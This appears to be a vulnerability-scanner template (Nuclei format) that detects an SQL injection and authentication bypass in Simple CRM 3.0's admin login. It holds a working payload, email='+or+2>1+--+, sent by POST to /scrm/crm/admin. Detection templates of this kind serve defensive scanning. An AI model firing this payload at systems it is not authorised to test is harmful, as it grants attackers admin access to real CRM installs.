id: simple-crm-sql-injection info: name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass author: geeknik severity: high reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt tags: sqli,simplecrm,auth-bypass,injection requests: - method: POST path: - "{{BaseURL}}/scrm/crm/admin" body: "email='+or+2>1+--+&password=&login=" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" part: body - type: word words: - "text/html" part: header